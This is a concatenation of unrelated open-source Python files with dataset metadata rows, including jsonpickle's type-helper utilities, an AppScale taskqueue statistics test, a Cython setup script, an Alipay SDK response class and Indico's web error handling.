if tooShort(header, seq, options, contTable) == False:
fastaWrite(outputFile, header, seq)
outputFile.close()
inputFile.close()
return 0
if __name__ == '__main__':
exit(main())
| 33.79798 | 94 | 0.582188 | [
"MIT-0"
] | adf-ncgr/cactus | preprocessor/cactus_filterSmallFastaSequences.py | 3,346 | Python |
# Copyright (C) 2008 John Paulett (john -at- paulett.org)
# Copyright (C) 2009-2018 David Aguilar (davvid -at- gmail.com)
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
"""Helper functions for pickling and unpickling. Most functions assist in
determining the type of an object.
"""
from __future__ import absolute_import, division, unicode_literals
import base64
import collections
import io
import operator
import sys
import time
import types
import inspect
from . import tags
from . import compat
from .compat import (
abc_iterator,
class_types,
iterator_types,
numeric_types,
PY2,
PY3,
PY3_ORDERED_DICT,
)
if PY2:
import __builtin__
SEQUENCES = (list, set, tuple)
SEQUENCES_SET = {list, set, tuple}
PRIMITIVES = {compat.ustr, bool, type(None)} | set(numeric_types)
NON_REDUCIBLE_TYPES = {
int,
float,
list,
dict,
set,
tuple,
object,
bytes,
types.FunctionType,
types.MethodType,
types.LambdaType,
types.BuiltinFunctionType,
types.BuiltinMethodType,
} | PRIMITIVES
def is_type(obj):
"""Returns True is obj is a reference to a type.
>>> is_type(1)
False
>>> is_type(object)
True
>>> class Klass: pass
>>> is_type(Klass)
True
"""
# use "isinstance" and not "is" to allow for metaclasses
return isinstance(obj, class_types)
def has_method(obj, name):
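    """Return True if *obj* has a properly bound method called *name*.

    Builtin and static methods always qualify; class methods must be bound to a
    compatible class, and instance methods to an instance of the right type.
    """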
# false if attribute doesn't exist
if not hasattr(obj, name):
return False
func = getattr(obj, name)
# builtin descriptors like __getnewargs__
if isinstance(func, types.BuiltinMethodType):
return True
# note that FunctionType has a different meaning in py2/py3
if not isinstance(func, (types.MethodType, types.FunctionType)):
return False
# need to go through __dict__'s since in py3
# methods are essentially descriptors
# __class__ for old-style classes
base_type = obj if is_type(obj) else obj.__class__
original = None
# there is no .mro() for old-style classes
for subtype in inspect.getmro(base_type):
original = vars(subtype).get(name)
if original is not None:
break
# name not found in the mro
if original is None:
return False
# static methods are always fine
if isinstance(original, staticmethod):
return True
    # at this point, the method has to be an instance method or a classmethod
self_attr = '__self__' if PY3 else 'im_self'
if not hasattr(func, self_attr):
return False
bound_to = getattr(func, self_attr)
# class methods
if isinstance(original, classmethod):
return issubclass(base_type, bound_to)
# bound methods
return isinstance(obj, type(bound_to))
def is_object(obj):
"""Returns True is obj is a reference to an object instance.
>>> is_object(1)
True
>>> is_object(object())
True
>>> is_object(lambda x: 1)
False
"""
return isinstance(obj, object) and not isinstance(
obj, (type, types.FunctionType, types.BuiltinFunctionType)
)
def is_primitive(obj):
"""Helper method to see if the object is a basic data type. Unicode strings,
integers, longs, floats, booleans, and None are considered primitive
and will return True when passed into *is_primitive()*
>>> is_primitive(3)
True
>>> is_primitive([4,4])
False
"""
return type(obj) in PRIMITIVES
def is_enum(obj):
"""Is the object an enum?"""
return 'enum' in sys.modules and isinstance(obj, sys.modules['enum'].Enum)
def is_dictionary(obj):
"""Helper method for testing if the object is a dictionary.
>>> is_dictionary({'key':'value'})
True
"""
return type(obj) is dict
def is_sequence(obj):
"""Helper method to see if the object is a sequence (list, set, or tuple).
>>> is_sequence([4])
True
"""
return type(obj) in SEQUENCES_SET
def is_list(obj):
"""Helper method to see if the object is a Python list.
>>> is_list([4])
True
"""
return type(obj) is list
def is_set(obj):
"""Helper method to see if the object is a Python set.
>>> is_set(set())
True
"""
return type(obj) is set
def is_bytes(obj):
"""Helper method to see if the object is a bytestring.
>>> is_bytes(b'foo')
True
"""
return type(obj) is bytes
def is_unicode(obj):
"""Helper method to see if the object is a unicode string"""
return type(obj) is compat.ustr
def is_tuple(obj):
"""Helper method to see if the object is a Python tuple.
>>> is_tuple((1,))
True
"""
return type(obj) is tuple
def is_dictionary_subclass(obj):
"""Returns True if *obj* is a subclass of the dict type. *obj* must be
a subclass and not the actual builtin dict.
>>> class Temp(dict): pass
>>> is_dictionary_subclass(Temp())
True
"""
# TODO: add UserDict
return (
hasattr(obj, '__class__')
and issubclass(obj.__class__, dict)
and type(obj) is not dict
)
def is_sequence_subclass(obj):
"""Returns True if *obj* is a subclass of list, set or tuple.
*obj* must be a subclass and not the actual builtin, such
as list, set, tuple, etc..
>>> class Temp(list): pass
>>> is_sequence_subclass(Temp())
True
"""
return (
hasattr(obj, '__class__')
and (issubclass(obj.__class__, SEQUENCES) or is_list_like(obj))
and not is_sequence(obj)
)
def is_noncomplex(obj):
"""Returns True if *obj* is a special (weird) class, that is more complex
than primitive data types, but is not a full object. Including:
* :class:`~time.struct_time`
"""
if type(obj) is time.struct_time:
return True
return False
def is_function(obj):
"""Returns true if passed a function
>>> is_function(lambda x: 1)
True
>>> is_function(locals)
True
>>> def method(): pass
>>> is_function(method)
True
>>> is_function(1)
False
"""
function_types = {
types.FunctionType,
types.MethodType,
types.LambdaType,
types.BuiltinFunctionType,
types.BuiltinMethodType,
}
return type(obj) in function_types
def is_module_function(obj):
"""Return True if `obj` is a module-global function
>>> import os
>>> is_module_function(os.path.exists)
True
>>> is_module_function(lambda: None)
False
"""
return (
hasattr(obj, '__class__')
and isinstance(obj, (types.FunctionType, types.BuiltinFunctionType))
and hasattr(obj, '__module__')
and hasattr(obj, '__name__')
and obj.__name__ != '<lambda>'
)
def is_module(obj):
"""Returns True if passed a module
>>> import os
>>> is_module(os)
True
"""
return isinstance(obj, types.ModuleType)
def is_picklable(name, value):
"""Return True if an object can be pickled
>>> import os
>>> is_picklable('os', os)
True
>>> def foo(): pass
>>> is_picklable('foo', foo)
True
>>> is_picklable('foo', lambda: None)
False
"""
if name in tags.RESERVED:
return False
return is_module_function(value) or not is_function(value)
def is_installed(module):
"""Tests to see if ``module`` is available on the sys.path
>>> is_installed('sys')
True
>>> is_installed('hopefullythisisnotarealmodule')
False
"""
try:
__import__(module)
return True
except ImportError:
return False
def is_list_like(obj):
return hasattr(obj, '__getitem__') and hasattr(obj, 'append')
def is_iterator(obj):
is_file = PY2 and isinstance(obj, __builtin__.file)
return (
isinstance(obj, abc_iterator) and not isinstance(obj, io.IOBase) and not is_file
)
def is_collections(obj):
try:
return type(obj).__module__ == 'collections'
except Exception:
return False
def is_reducible_sequence_subclass(obj):
return hasattr(obj, '__class__') and issubclass(obj.__class__, SEQUENCES)
def is_reducible(obj):
"""
Returns false if of a type which have special casing,
and should not have their __reduce__ methods used
"""
# defaultdicts may contain functions which we cannot serialise
if is_collections(obj) and not isinstance(obj, collections.defaultdict):
return True
# sets are slightly slower in this case
if type(obj) in NON_REDUCIBLE_TYPES:
return False
elif obj is object:
return False
elif is_list_like(obj):
return False
elif isinstance(obj, types.ModuleType):
return False
elif is_dictionary_subclass(obj):
return False
elif is_reducible_sequence_subclass(obj):
return False
elif isinstance(getattr(obj, '__slots__', None), iterator_types):
return False
elif is_type(obj) and obj.__module__ == 'datetime':
return False
return True
def in_dict(obj, key, default=False):
"""
Returns true if key exists in obj.__dict__; false if not in.
If obj.__dict__ is absent, return default
"""
return (key in obj.__dict__) if getattr(obj, '__dict__', None) else default
def in_slots(obj, key, default=False):
"""
Returns true if key exists in obj.__slots__; false if not in.
If obj.__slots__ is absent, return default
"""
return (key in obj.__slots__) if getattr(obj, '__slots__', None) else default
def has_reduce(obj):
"""
Tests if __reduce__ or __reduce_ex__ exists in the object dict or
in the class dicts of every class in the MRO *except object*.
Returns a tuple of booleans (has_reduce, has_reduce_ex)
"""
if not is_reducible(obj) or is_type(obj):
return (False, False)
# in this case, reduce works and is desired
# notwithstanding depending on default object
# reduce
if is_noncomplex(obj):
return (False, True)
has_reduce = False
has_reduce_ex = False
REDUCE = '__reduce__'
REDUCE_EX = '__reduce_ex__'
# For object instance
has_reduce = in_dict(obj, REDUCE) or in_slots(obj, REDUCE)
has_reduce_ex = in_dict(obj, REDUCE_EX) or in_slots(obj, REDUCE_EX)
# turn to the MRO
for base in type(obj).__mro__:
if is_reducible(base):
has_reduce = has_reduce or in_dict(base, REDUCE)
has_reduce_ex = has_reduce_ex or in_dict(base, REDUCE_EX)
if has_reduce and has_reduce_ex:
return (has_reduce, has_reduce_ex)
# for things that don't have a proper dict but can be
# getattred (rare, but includes some builtins)
cls = type(obj)
object_reduce = getattr(object, REDUCE)
object_reduce_ex = getattr(object, REDUCE_EX)
if not has_reduce:
has_reduce_cls = getattr(cls, REDUCE, False)
if has_reduce_cls is not object_reduce:
has_reduce = has_reduce_cls
if not has_reduce_ex:
has_reduce_ex_cls = getattr(cls, REDUCE_EX, False)
if has_reduce_ex_cls is not object_reduce_ex:
has_reduce_ex = has_reduce_ex_cls
return (has_reduce, has_reduce_ex)
def translate_module_name(module):
"""Rename builtin modules to a consistent module name.
Prefer the more modern naming.
This is used so that references to Python's `builtins` module can
be loaded in both Python 2 and 3. We remap to the "__builtin__"
name and unmap it when importing.
Map the Python2 `exceptions` module to `builtins` because
`builtins` is a superset and contains everything that is
available in `exceptions`, which makes the translation simpler.
See untranslate_module_name() for the reverse operation.
"""
lookup = dict(__builtin__='builtins', exceptions='builtins')
return lookup.get(module, module)
def untranslate_module_name(module):
"""Rename module names mention in JSON to names that we can import
This reverses the translation applied by translate_module_name() to
a module name available to the current version of Python.
"""
module = _0_9_6_compat_untranslate(module)
lookup = dict(builtins='__builtin__') if PY2 else {}
return lookup.get(module, module)
def _0_9_6_compat_untranslate(module):
"""Provide compatibility for pickles created with jsonpickle 0.9.6 and
earlier, remapping `exceptions` and `__builtin__` to `builtins`.
"""
lookup = dict(__builtin__='builtins', exceptions='builtins')
return lookup.get(module, module)
def importable_name(cls):
"""
>>> class Example(object):
... pass
>>> ex = Example()
>>> importable_name(ex.__class__) == 'jsonpickle.util.Example'
True
>>> importable_name(type(25)) == 'builtins.int'
True
>>> importable_name(None.__class__) == 'builtins.NoneType'
True
>>> importable_name(False.__class__) == 'builtins.bool'
True
>>> importable_name(AttributeError) == 'builtins.AttributeError'
True
"""
# Use the fully-qualified name if available (Python >= 3.3)
name = getattr(cls, '__qualname__', cls.__name__)
module = translate_module_name(cls.__module__)
return '{}.{}'.format(module, name)
def b64encode(data):
"""
Encode binary data to ascii text in base64. Data must be bytes.
"""
return base64.b64encode(data).decode('ascii')
def b64decode(payload):
"""
Decode payload - must be ascii text.
"""
return base64.b64decode(payload)
def b85encode(data):
"""
Encode binary data to ascii text in base85. Data must be bytes.
"""
if PY2:
raise NotImplementedError("Python 2 can't encode data in base85.")
return base64.b85encode(data).decode('ascii')
def b85decode(payload):
"""
Decode payload - must be ascii text.
"""
if PY2:
raise NotImplementedError("Python 2 can't decode base85-encoded data.")
return base64.b85decode(payload)
def itemgetter(obj, getter=operator.itemgetter(0)):
return compat.ustr(getter(obj))
def items(obj):
"""Iterate over dicts in a deterministic order
Python2 does not guarantee dict ordering, so this function
papers over the difference in behavior. Python3 does guarantee
dict order, without use of OrderedDict, so no sorting is needed there.
"""
if PY3_ORDERED_DICT:
for k, v in obj.items():
yield k, v
else:
for k, v in sorted(obj.items(), key=itemgetter):
yield k, v
| 24.875639 | 88 | 0.658061 | [
"BSD-3-Clause"
] | antoinecollet5/Jsonpickle | jsonpickle/util.py | 14,602 | Python |
import argparse
def train_args():
"""
Retrieves and parses the 3 command line arguments provided by the user when
they run the program from a terminal window. This function uses Python's
argparse module to created and defined these 3 command line arguments. If
the user fails to provide some or all of the 3 arguments, then the default
values are used for the missing arguments.
:return: results: data structure that stores the command line arguments object
"""
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', action='store',
dest='data_dir',
default='flowers',
help='Path the directory of the dataset, should contain sub-directories /train, /test, /valid')
parser.add_argument('--save_dir', action='store',
dest='save_dir',
default='checkpoint.pth',
help='Set directory to save checkpoints')
parser.add_argument('--arch', action='store',
dest='arch',
default='vgg16',
help='Choose architecture. Default: vgg16')
parser.add_argument('--learning_rate', action='store',
dest='learning_rate',
default=0.003,
help='Set the learning rate',
type=float)
parser.add_argument('--hidden_units', action='store',
dest='hidden_units',
default=256,
help='Add the hidden units',
type=int)
parser.add_argument('--epochs', action='store',
dest='epochs',
default=30,
help='Add number of epoch cycles',
type=int)
parser.add_argument('--gpu', action='store_true',
dest='gpu',
help='Activate GPU')
results = parser.parse_args()
return results
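# Illustrative usage sketch (assumed, not part of the original script): how a
# training entry point might consume the parsed arguments. Attribute names
# match the dest values defined above; the device selection is only a hint.
if __name__ == '__main__':
    args = train_args()
    print('data_dir:', args.data_dir, '| checkpoint:', args.save_dir)
    print('arch:', args.arch, '| lr:', args.learning_rate,
          '| hidden units:', args.hidden_units, '| epochs:', args.epochs)
    print('device:', 'cuda' if args.gpu else 'cpu')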
| 38.236364 | 119 | 0.523062 | [
"MIT"
] | victoray/ImageClasssifier | train_args.py | 2,103 | Python |
import pandas as pd
import plotly.graph_objects as go
import plotly.express as px
import plotly.figure_factory as ff
import numpy as np
from plotly.subplots import make_subplots
from tqdm import tqdm
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
from sklearn.feature_selection import VarianceThreshold
from sklearn.model_selection import train_test_split
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import GridSearchCV
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
train_df = pd.read_csv("../data/titanic/train.csv")
train = train_df.copy()
family_column = train['SibSp'] + train['Parch']
train['Family'] = family_column
train = train[['Survived', 'Pclass', 'Name', 'Sex', 'Age', 'Family', 'Embarked', 'Fare']]
# Account for missingness
train['Age'] = train['Age'].interpolate()
train['Fare'] = train['Fare'].interpolate()
train.head(5)
| 29.027778 | 89 | 0.796172 | [
"MIT"
] | kguarian/Classification-Algorithms | knn/main.py | 1,045 | Python |
import sys
import json
from appscale.common.service_stats import stats_manager
from mock import mock, patch
from tornado.testing import AsyncHTTPTestCase
from appscale.common.unpackaged import APPSCALE_PYTHON_APPSERVER
from appscale.taskqueue import appscale_taskqueue, rest_api, statistics
sys.path.append(APPSCALE_PYTHON_APPSERVER)
class TestServiceStatistics(AsyncHTTPTestCase):
def get_app(self):
""" Overwrites method of AsyncHTTPTestCase.
Returns:
an instance of tornado application
"""
    # We mock functionality which uses the distributed taskqueue, so we can omit it
distributed_taskqueue = None
return appscale_taskqueue.prepare_taskqueue_application(
task_queue=distributed_taskqueue
)
def setUp(self):
""" Patches handlers of Taskqueue application in order
to prevent real calls to Cassandra and Datastore because only
service statistics matters for this test.
"""
super(TestServiceStatistics, self).setUp()
# Patch get_status of REST handlers
handlers = [rest_api.RESTQueue, rest_api.RESTTask,
rest_api.RESTLease, rest_api.RESTTasks]
self.patchers = []
self.get_http_status_mock = mock.MagicMock()
for handler in handlers:
patcher = patch.object(handler, 'get_status', self.get_http_status_mock)
patcher.start()
self.patchers.append(patcher)
    # Patch all http methods as they are not the object of this test
for method in ['get', 'post', 'put', 'delete', 'patch']:
def method_impl(*args, **kwargs):
return None
patcher = patch.object(handler, method, method_impl)
patcher.start()
self.patchers.append(patcher)
# Patch remote_request method of protobuffer handler
remote_request_patcher = patch.object(
appscale_taskqueue.ProtobufferHandler, 'remote_request'
)
self.pb_remote_request_mock = remote_request_patcher.start()
self.patchers.append(remote_request_patcher)
time_patcher = patch.object(stats_manager.time, 'time')
self.time_mock = time_patcher.start()
self.patchers.append(time_patcher)
def tearDown(self):
super(TestServiceStatistics, self).tearDown()
# Stops all patchers.
for patcher in self.patchers:
patcher.stop()
reload(statistics)
reload(rest_api)
reload(appscale_taskqueue)
def test_stats(self):
self.time_mock.return_value = 1000
# Specify stub information for protobuffer requests
pb_headers = {
'protocolbuffertype': 'Request',
'appdata': 'test-app',
'Version': 'test-version',
'Module': 'test-module'
}
pb_body = "does not matter"
# Do 6 protobuffer requests:
# Mock remote_request method to return tuple (pb_method, pb_status)
self.pb_remote_request_mock.return_value = 'BulkAdd', 'OK'
self.fetch('/queues', method='POST', body=pb_body, headers=pb_headers)
self.pb_remote_request_mock.return_value = 'BulkAdd', 'OK'
self.fetch('/queues', method='POST', body=pb_body, headers=pb_headers)
self.pb_remote_request_mock.return_value = 'FetchTask', 'OK'
self.fetch('/queues', method='POST', body=pb_body, headers=pb_headers)
self.pb_remote_request_mock.return_value = 'PauseQueue', 'UNKNOWN_QUEUE'
self.fetch('/queues', method='POST', body=pb_body, headers=pb_headers)
self.pb_remote_request_mock.return_value = 'PauseQueue', 'OK'
self.fetch('/queues', method='POST', body=pb_body, headers=pb_headers)
self.pb_remote_request_mock.return_value = 'FetchTask', 'UNKNOWN_TASK'
self.fetch('/queues', method='POST', body=pb_body, headers=pb_headers)
# Do 9 REST requests:
# Mock get_status method of REST handlers to return wanted http status
self.get_http_status_mock.return_value = 200
path = '/taskqueue/v1beta2/projects/app1/taskqueues/queue1'
self.fetch(path, method='GET')
self.get_http_status_mock.return_value = 200
path = '/taskqueue/v1beta2/projects/app1/taskqueues/queue1'
self.fetch(path, method='GET')
self.get_http_status_mock.return_value = 200
path = '/taskqueue/v1beta2/projects/app1/taskqueues/queue1/tasks'
self.fetch(path, method='GET')
self.get_http_status_mock.return_value = 200
path = '/taskqueue/v1beta2/projects/app1/taskqueues/qeueu1/tasks'
self.fetch(path, method='POST', allow_nonstandard_methods=True)
self.get_http_status_mock.return_value = 200
path = '/taskqueue/v1beta2/projects/app1/taskqueues/qeueu1/tasks'
self.fetch(path, method='POST', allow_nonstandard_methods=True)
self.get_http_status_mock.return_value = 200
path = '/taskqueue/v1beta2/projects/app1/taskqueues/qeueu1/tasks/task1'
self.fetch(path, method='GET')
self.get_http_status_mock.return_value = 500
path = '/taskqueue/v1beta2/projects/app1/taskqueues/qeueu1/tasks/task1'
self.fetch(path, method='DELETE', allow_nonstandard_methods=True)
self.get_http_status_mock.return_value = 404
path = '/taskqueue/v1beta2/projects/app1/taskqueues/unknown/tasks/task1'
self.fetch(path, method='PATCH', allow_nonstandard_methods=True)
self.get_http_status_mock.return_value = 404
path = '/taskqueue/v1beta2/projects/unknown/taskqueues/qeueu1/tasks/task1'
self.fetch(path, method='GET')
# Fetch statistics
raw_stats = self.fetch('/service-stats').body
stats = json.loads(raw_stats)
# Pop and check time-related fields
self.assertGreater(stats['cumulative_counters'].pop('from'), 0)
self.assertGreater(stats['cumulative_counters'].pop('to'), 0)
self.assertGreater(stats['recent_stats'].pop('from'), 0)
self.assertGreater(stats['recent_stats'].pop('to'), 0)
self.assertGreaterEqual(stats['recent_stats'].pop('avg_latency'), 0)
# Verify other fields
self.assertEqual(stats, {
'current_requests': 0,
'cumulative_counters': {
'all': 15,
'failed': 5,
'pb_reqs': 6,
'rest_reqs': 9
},
'recent_stats': {
'all': 15,
'failed': 5,
'pb_reqs': 6,
'rest_reqs': 9,
'by_rest_method': {
'get_task': 2,
'get_tasks': 1,
'delete_task': 1,
'get_queue': 2,
'patch_task': 1,
'post_tasks': 2
},
'by_rest_status': {
'200': 6,
'404': 2,
'500': 1
},
'by_pb_method': {
'BulkAdd': 2,
'PauseQueue': 2,
'FetchTask': 2
},
'by_pb_status': {
'OK': 4,
'UNKNOWN_TASK': 1,
'UNKNOWN_QUEUE': 1
}}})
def test_scroll_stats(self):
self.time_mock.return_value = 1000
self.get_http_status_mock.return_value = 200
self.fetch('/taskqueue/v1beta2/projects/app1/taskqueues/queue1')
self.time_mock.return_value = 2000
self.get_http_status_mock.return_value = 200
self.fetch('/taskqueue/v1beta2/projects/app1/taskqueues/queue1')
self.time_mock.return_value = 3000
self.get_http_status_mock.return_value = 200
self.fetch('/taskqueue/v1beta2/projects/app1/taskqueues/queue1')
# Fetch statistics
self.time_mock.return_value = 99999 # current time doesn't matter
# for scrolling
raw_stats = self.fetch('/service-stats?cursor=1500000').body
stats = json.loads(raw_stats)
self.assertEqual(stats['cumulative_counters']['all'], 3)
self.assertEqual(stats['recent_stats']['all'], 2)
def test_recent_stats(self):
self.time_mock.return_value = 1000
self.get_http_status_mock.return_value = 200
self.fetch('/taskqueue/v1beta2/projects/app1/taskqueues/queue1')
self.time_mock.return_value = 2000
self.get_http_status_mock.return_value = 200
self.fetch('/taskqueue/v1beta2/projects/app1/taskqueues/queue1')
self.time_mock.return_value = 3000
self.get_http_status_mock.return_value = 200
self.fetch('/taskqueue/v1beta2/projects/app1/taskqueues/queue1')
# Fetch statistics as if it was in the future
self.time_mock.return_value = 99999 # current time does matter for recent
raw_stats = self.fetch('/service-stats?last_milliseconds=2000000').body
stats = json.loads(raw_stats)
self.assertEqual(stats['cumulative_counters']['all'], 3)
self.assertEqual(stats['recent_stats']['all'], 0) # 0 for last 2 seconds
# Fetch statistics as if it was just after requests
self.time_mock.return_value = 3500 # current time does matter for recent
raw_stats = self.fetch('/service-stats?last_milliseconds=2000000').body
stats = json.loads(raw_stats)
self.assertEqual(stats['cumulative_counters']['all'], 3)
self.assertEqual(stats['recent_stats']['all'], 2) # 2 for last 2 seconds
| 38.424779 | 78 | 0.697835 | [
"Apache-2.0"
] | HafeezRai/appscale | AppTaskQueue/test/unit/test_service_stats.py | 8,684 | Python |
import os
from setuptools import Extension, setup
import sys
from Cython.Build import build_ext
import numpy
NAME = "olive-camera-dcamapi"
VERSION = "0.1"
DESCRIPTION = "A small template project that shows how to wrap C/C++ code into python using Cython"
URL = "https://github.com/liuyenting/olive-camera-dcamapi"
# Trove classifiers
# https://pypi.org/classifiers/
CLASSIFIERS = [
"License :: OSI Approved :: Apache Software License",
"Operating System :: Microsoft :: Windows",
]
KEYWORDS = []
AUTHOR = "Liu, Yen-Ting"
EMAIL = "[email protected]"
REQUIRES = ["numpy", "trio~=0.13.0"]
PACKAGES = ["olive.drivers.dcamapi"]
EXT_DEFS = [
{
"name": "olive.drivers.dcamapi.wrapper",
"language": "c++",
"include_dirs": [
# "Module .pxd file not found next to .pyx file", https://github.com/cython/cython/issues/2452
".",
# numpy
numpy.get_include(),
],
"libraries": ["dcamapi"],
"library_dirs": ["lib"],
}
]
######################################################################################
cwd = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(cwd, "README.md"), encoding="utf-8") as fd:
LONG_DESCRIPTION = fd.read()
# - install cython headers so other modules can cimport
# - force sdist to keep the .pyx files
PACKAGE_DATA = {pkg: ["*.pxd", "*.pyx"] for pkg in PACKAGES}
def generate_extension(ext_def):
"""Generate extension constructors."""
assert "name" in ext_def, "invalid extension name"
ext_path = ext_def["name"].replace(".", os.path.sep) + ".pyx"
ext_root = os.path.dirname(ext_path)
ext_def["sources"] = [ext_path]
if "extra_objects" in ext_def:
if not sys.platform.startswith("linux"):
# NOTE:
# re-route static library on Windows https://stackoverflow.com/a/49139257
# extract names
static_libs = [os.path.split(lib) for lib in ext_def["extra_objects"]]
lib_dirs, lib_names = zip(*static_libs)
lib_names = [os.path.splitext(name)[0] for name in lib_names]
# 1) save it into 'libraries'
# 2) append search path (remove duplicates on-the-fly)
ext_def.setdefault("libraries", []).extend(lib_names)
ext_def.setdefault("library_dirs", []).extend(list(set(lib_dirs)))
# empty 'extra_objects'
del ext_def["extra_objects"]
# prepend root directory
arguments = (
"include_dirs",
"library_dirs",
"runtime_library_dirs",
"extra_objects",
)
for argument in arguments:
try:
ext_def[argument] = [
os.path.join(ext_root, path) for path in ext_def[argument]
]
except KeyError:
# ignore unused argument
pass
return Extension(**ext_def)
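# Illustrative sketch (assumed, not part of the original build script): what
# generate_extension() does to a definition that lists a static library in
# 'extra_objects'. The paths are hypothetical and only demonstrate the
# Windows re-routing and the root-directory prefixing implemented above.
#   demo_def = {
#       "name": "olive.drivers.dcamapi.wrapper",
#       "language": "c++",
#       "include_dirs": ["include"],
#       "extra_objects": ["lib/dcamapi.lib"],
#   }
#   ext = generate_extension(demo_def)
#   # On Windows: libraries gains 'dcamapi', library_dirs gains 'lib', and
#   # both include_dirs and library_dirs are prefixed with the extension's
#   # source directory (olive/drivers/dcamapi).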
EXTENSIONS = [generate_extension(ext_def) for ext_def in EXT_DEFS]
setup(
#
# Project Info
#
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
url=URL,
classifiers=CLASSIFIERS,
keywords=KEYWORDS,
#
# Author
#
author=AUTHOR,
author_email=EMAIL,
#
# Dependencies
#
# use pyproject.toml for setup dependencies instead
    # setup_requires=[],
install_requires=REQUIRES,
#
# Package Structure
#
# package to install
packages=PACKAGES,
package_data=PACKAGE_DATA,
#
# Build Instruction
#
cmdclass={"build_ext": build_ext},
ext_modules=EXTENSIONS,
# disable zip_safe
# - Cython cannot find .pxd files inside installed .egg
    # - dynamic loader may require library unzipped to a temporary directory at import time
zip_safe=False,
)
| 28.820144 | 107 | 0.590864 | [
"Apache-2.0"
] | liuyenting/olive-camera-dcamapi | setup.py | 4,006 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AntMerchantExpandBenefitConfirmResponse(AlipayResponse):
def __init__(self):
super(AntMerchantExpandBenefitConfirmResponse, self).__init__()
self._benefit_instance_id = None
self._detail_msg = None
self._error_code = None
self._grant_sn = None
self._record_id = None
self._result = None
@property
def benefit_instance_id(self):
return self._benefit_instance_id
@benefit_instance_id.setter
def benefit_instance_id(self, value):
self._benefit_instance_id = value
@property
def detail_msg(self):
return self._detail_msg
@detail_msg.setter
def detail_msg(self, value):
self._detail_msg = value
@property
def error_code(self):
return self._error_code
@error_code.setter
def error_code(self, value):
self._error_code = value
@property
def grant_sn(self):
return self._grant_sn
@grant_sn.setter
def grant_sn(self, value):
self._grant_sn = value
@property
def record_id(self):
return self._record_id
@record_id.setter
def record_id(self, value):
self._record_id = value
@property
def result(self):
return self._result
@result.setter
def result(self, value):
self._result = value
def parse_response_content(self, response_content):
response = super(AntMerchantExpandBenefitConfirmResponse, self).parse_response_content(response_content)
if 'benefit_instance_id' in response:
self.benefit_instance_id = response['benefit_instance_id']
if 'detail_msg' in response:
self.detail_msg = response['detail_msg']
if 'error_code' in response:
self.error_code = response['error_code']
if 'grant_sn' in response:
self.grant_sn = response['grant_sn']
if 'record_id' in response:
self.record_id = response['record_id']
if 'result' in response:
self.result = response['result']
| 28.868421 | 112 | 0.662261 | [
"Apache-2.0"
] | articuly/alipay-sdk-python-all | alipay/aop/api/response/AntMerchantExpandBenefitConfirmResponse.py | 2,194 | Python |
# This file is part of Indico.
# Copyright (C) 2002 - 2019 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from __future__ import absolute_import, unicode_literals
import traceback
from uuid import uuid4
from flask import g, jsonify, render_template, request, session
from itsdangerous import BadData
from sqlalchemy.exc import OperationalError
from werkzeug.exceptions import Forbidden, HTTPException
from indico.core.errors import NoReportError
from indico.legacy.common.cache import GenericCache
from indico.web.util import get_request_info
from indico.web.views import WPError
def render_error(exc, title, message, code, standalone=False):
_save_error(exc, title, message)
if _need_json_response():
return _jsonify_error(exc, title, message, code)
elif standalone:
return render_template('standalone_error.html', error_message=title, error_description=message), code
else:
try:
return WPError(title, message).getHTML(), code
except OperationalError:
            # If the error was caused while connecting to the database,
            # rendering the error page fails since e.g. the header/footer
            # templates access the database or call hooks doing so.
            # In this case we simply fall back to the standalone error
# page which does not show the indico UI around the error
# message but doesn't require any kind of DB connection.
return render_error(exc, title, message, code, standalone=True)
def load_error_data(uuid):
return GenericCache('errors').get(uuid)
def _save_error(exc, title, message):
# Note that `exc` is only used to check if the error should be saved.
# Any other information is taken from `sys.exc_info()`!
if 'saved_error_uuid' in g:
return
if not _is_error_reportable(exc):
return
g.saved_error_uuid = uuid = unicode(uuid4())
# XXX: keep this outside - it must be called before `get_request_info()`
# as that function may mess up `sys.exc_info()` in case accessing user
# details fails
tb = traceback.format_exc()
data = {'title': title,
'message': message,
'request_info': get_request_info(),
'traceback': tb,
'sentry_event_id': g.get('sentry_event_id')}
GenericCache('errors').set(uuid, data, 7200)
def _need_json_response():
return request.is_xhr or request.is_json
def _is_error_reportable(exc):
# error marked as not reportable
if isinstance(exc, NoReportError) or getattr(exc, '_disallow_report', False):
return False
elif isinstance(exc, BadData):
# itsdangerous stuff - should only fail if someone tampers with a link
return False
elif isinstance(exc, Forbidden):
# forbidden errors for guests are not reportable
# for other users: same logic as any other http exception
return _need_json_response() and session.user is not None
elif isinstance(exc, HTTPException):
# http exceptions can only be reported if they occur during
# an AJAX request - otherwise they are typically caused by
# users doing something wrong (typing a 404 URL, messing with
# data, etc)
return _need_json_response()
else:
return True
def _jsonify_error(exc, title, message, code):
error_data = {
'title': title,
'message': message,
'error_uuid': g.get('saved_error_uuid') if _is_error_reportable(exc) else None,
}
response = jsonify(error=error_data)
response.status_code = code
return response
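# Illustrative sketch (assumed wiring, not how Indico registers its handlers):
# a Flask error handler could delegate to render_error(), which saves the
# report data and returns either a JSON or an HTML response depending on the
# type of request.
#   @app.errorhandler(Exception)
#   def _handle_unexpected_error(exc):
#       return render_error(exc, 'Something went wrong',
#                           'An unexpected error occurred.', 500)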
| 36.792079 | 109 | 0.694564 | [
"MIT"
] | fweng322/indico | indico/web/errors.py | 3,716 | Python |
"""Tests for iterating over expression clauses.
Since BooleanExpression's iter_clauses variations are basically wrappers
around the functions of the same name from ExpressionTreeNode, they are not
tested in-depth here. Instead, take a look at the unit tests for
ExpressionTreeNode's implementation.
"""
import unittest
from tt.expressions import BooleanExpression
class TestExpressionIterClauses(unittest.TestCase):
def test_simple_iter_clauses(self):
"""Test basic expression iter_clauses functionality."""
# ensure defaults to CNF
b = BooleanExpression('A or B or C or D')
self.assertTrue(b.is_cnf)
self.assertTrue(b.is_dnf)
clauses = b.iter_clauses()
self.assertEqual(
